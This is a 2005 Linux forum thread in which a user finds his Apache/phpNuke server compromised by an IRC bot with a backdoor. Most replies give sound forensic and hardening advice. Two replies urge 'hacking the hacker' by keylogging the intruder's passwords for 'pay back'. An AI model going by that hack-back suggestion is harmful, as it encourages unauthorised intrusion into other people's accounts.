LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 04-04-2005, 05:01 AM   #1
Avatar33
Member
 
Registered: May 2003
Location: South Africa
Distribution: Ubuntu
Posts: 75

Rep: Reputation: 15
Sever compromised?


Hi all.

I'm very worried about the security of my companies server. We only have a web server and sshd running on it .
Its a mandrake 9.2 machine with apache2-2.0.47 on it. When looking at the syslog i started getting suspicious. I then did a netstat -anp which made me even more worried. Here is how it looks:
Code:
tcp        0      1 192.16.4.2:57467        62.235.13.228:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57471        207.96.122.250:6665     SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57464        207.173.16.33:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57472        66.28.140.14:6667       SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57461        69.16.172.34:6667       SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57465        62.179.100.76:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57468        201.224.87.98:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57460        195.54.102.4:6667       SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57463        62.250.14.6:6669        SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57474        195.47.220.2:6667       SYN_SENT    9170/inetd
tcp        0      1 192.16.4.2:57473        202.91.34.9:6667        SYN_SENT    25958/apache
tcp        0      1 192.16.4.2:57470        193.110.95.1:6667       SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57462        208.247.17.10:6667      SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57475        195.197.175.21:7000     SYN_SENT    9170/inetd
tcp        0      1 192.16.4.2:57469        199.184.165.133:6667    SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57466        140.99.102.4:6667       SYN_SENT    13199/uptime
Note: I've not used my servers real IP address (192.16.4.2)
I've found out that all these programs that are trying to access irc ( Is this correct?) are running under the apache user, which means that our webserver has been hacked, or so I think. Luckily the firewall is blocking these outgoing messages. Also there was a program called "mech" running doing exactly the same as the programs above, but i've now killed it, so it's no longer running. It is also interesting that this mech program was located in /var/tmp/PsY/

Well I think it is quite obvious what my question is. Is there a vulnerability in my webserver configuration and how do I go about finding it? Any suggested reading that I should do?

Also I've been using tripwire so I'm going to go through its report to try find out what has happened.

Any advice would be greatly appreciated!
Avatar
 
Old 04-04-2005, 05:31 AM   #2
ilikejam
Senior Member
 
Registered: Aug 2003
Location: Glasgow
Distribution: Fedora / Solaris
Posts: 3,109

Rep: Reputation: 96
Hi.

Yes you've been cracked. Do a google search for 'psy.tgz' for further info.

Before you do that, though, get that server off the network - who knows what else it's being used for.

Dave
 
Old 04-04-2005, 08:08 AM   #3
Avatar33
Member
 
Registered: May 2003
Location: South Africa
Distribution: Ubuntu
Posts: 75

Original Poster
Rep: Reputation: 15
Thanks Dave for your reply.

I took the server off the Net. But I would really like to learn more about what happened, or else it will keep happening.
I've taken a look at the syslog and it seems shorewall started blocking these IRC requests on the 23 March. So I've not been very observant :-(

Surely there is some way to search the relevant logs for events that happened around that time? I just don't know which logs to check. I'm guessing that whoever hacked the server wanted to keep this server accessible for later on, so there must be something in the startup scripts ( or similar) that I can use to find more info.

I've also found out that apache now has port 4000 open ( the door for the hacker, I'm guessing)

How would I find out if the person has hacked only apache or has been able to hack root?

I really want to use this bad experience as a way to learn more about security, so _any_ hints or additional info would really be appreciated.

Thanks
Avatar
 
Old 04-04-2005, 07:48 PM   #4
Krugger
Member
 
Registered: Oct 2004
Posts: 229

Rep: Reputation: 30
I just had an idea.

How about you put a nice keylogger and another computer bridging the connection so you can sniff it without the hacker noticing it?

Now you let the hacker play around on your server and he is bound to log into something or do some stuff. So you log his passwords and get to know his ip and as he seems to like irc his nick and other info on him. You might even find out how he is getting in.

You would hack the hacker. You can then do what you want but I would say pay back time
 
Old 04-04-2005, 10:06 PM   #5
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
First let me say that a complete format and reinstall will be necessary when your done doing forensics.

Probably good places to start looking would be to take a look at the apache/httpd logs for any abnormal error messages. Also look through the general system logs for anything suspicious. You should definitely download and run rootkit hunter and chkrootkit on the system, as there are a bunch of things listening as services that shouldn't be (like init for example), which makes a rootkit likely. If that's the case, then you may need to use a cd-based distro like knoppix-std or FIRE to do any further analysis.

You may have some luck looking those processes up by their process ID number in /proc/<PID>/cmdline. If you find anything interesting there (like a path to the binary) take a look at the contents and see what you can find.

With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permission for stuff in the server root?
 
Old 04-05-2005, 04:13 PM   #6
Avatar33
Member
 
Registered: May 2003
Location: South Africa
Distribution: Ubuntu
Posts: 75

Original Poster
Rep: Reputation: 15
Thanks guys for your replyies.

I'm not in front of my server right now, so all the info I post now is out of my head.

I will make sure that I format and reinstall once I've my detective work.
I have run the chkrootkit and found an infected item ( I will post more detail later, when I'm infront of my box) listening on port 4000.

I've found the direrectory where the hacker downloaded/placed his tools, It's in /var/tmp if I'm not mistaken and that directory is owned by the apache user. And yes init was running and located in this directory. What is the relevance of init running?

Quote:
With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permission for stuff in the server root?
I was running apache 2.0.47, with a php-nuke based site. I've not heard of any hacks against php-nuke, so it might have been the apache-version that had problems? There were very few ports open, a few required ports, port 80, and port 22( for ssh, used only with private/public keys)

Thanks very much for the links, I see I have much reading to do.

Cheers
Avatar
 
Old 04-05-2005, 04:32 PM   #7
nistelrooy
Member
 
Registered: Oct 2003
Location: Singapore
Distribution: debian
Posts: 162

Rep: Reputation: 30
phpnuke is one of the most prone cms i've ever used/experienced. convert to postnuke or get other cms to work with. what version is your phpnuke?
 
Old 04-08-2005, 04:27 PM   #8
mikeheggy
Member
 
Registered: Jan 2005
Posts: 37

Rep: Reputation: 15
I've read up on phpnuke too, and wanted to start a website using that program, but I was apprehensive about it.

To prevent something like this again, you might want to try the patched versions from Nuke fixes, which, among other things, filter out mysql injection attacks.

Also, check out mod_security for apache. This prevents popular web attacks before they reach the script. I use the rules from http://www.gotroot.com/mod_security+rules
 
Old 04-11-2005, 07:07 AM   #9
Avatar33
Member
 
Registered: May 2003
Location: South Africa
Distribution: Ubuntu
Posts: 75

Original Poster
Rep: Reputation: 15
Sorry for the delay.

We were using phpNuke 7.4.

I'll take a look at mod_security.
Thanks all for your help.
Avatar
 
Old 04-11-2005, 07:39 AM   #10
aqoliveira
Member
 
Registered: Dec 2001
Location: Portugal
Distribution: /Red Hat/Fedora/Solaris
Posts: 620

Rep: Reputation: 30
howzit

Check /var/log/messages and /var/log/secure files as well

chees
boot
lekker blei
 
Old 05-08-2005, 06:48 AM   #11
comptiger5000
Member
 
Registered: May 2005
Distribution: Fedora Core Since version 3
Posts: 193

Rep: Reputation: 30
once you're done hacking the hacker, report as much as possible about him to the FBI
 
Old 05-09-2005, 09:19 AM   #12
matrixcubed
LQ Newbie
 
Registered: May 2004
Location: Gatineau, QC
Distribution: Ubuntu 6.10
Posts: 25

Rep: Reputation: 15
You might consider using a chrootkit as well, to detect any malicious software which might have been installed recently!
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
SME sever emailssent Linux - Networking 5 11-01-2004 09:04 PM
Mail Sever emailssent Linux - Networking 7 10-09-2004 11:06 AM
file sever civicracer999 Linux - Networking 2 07-23-2004 11:04 PM
Should I buy a sever!? zetsui Linux - Hardware 9 01-25-2004 06:38 PM
X Sever Crash chutzpah Linux - Software 5 04-30-2003 04:06 AM


All times are GMT -5. The time now is 05:48 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration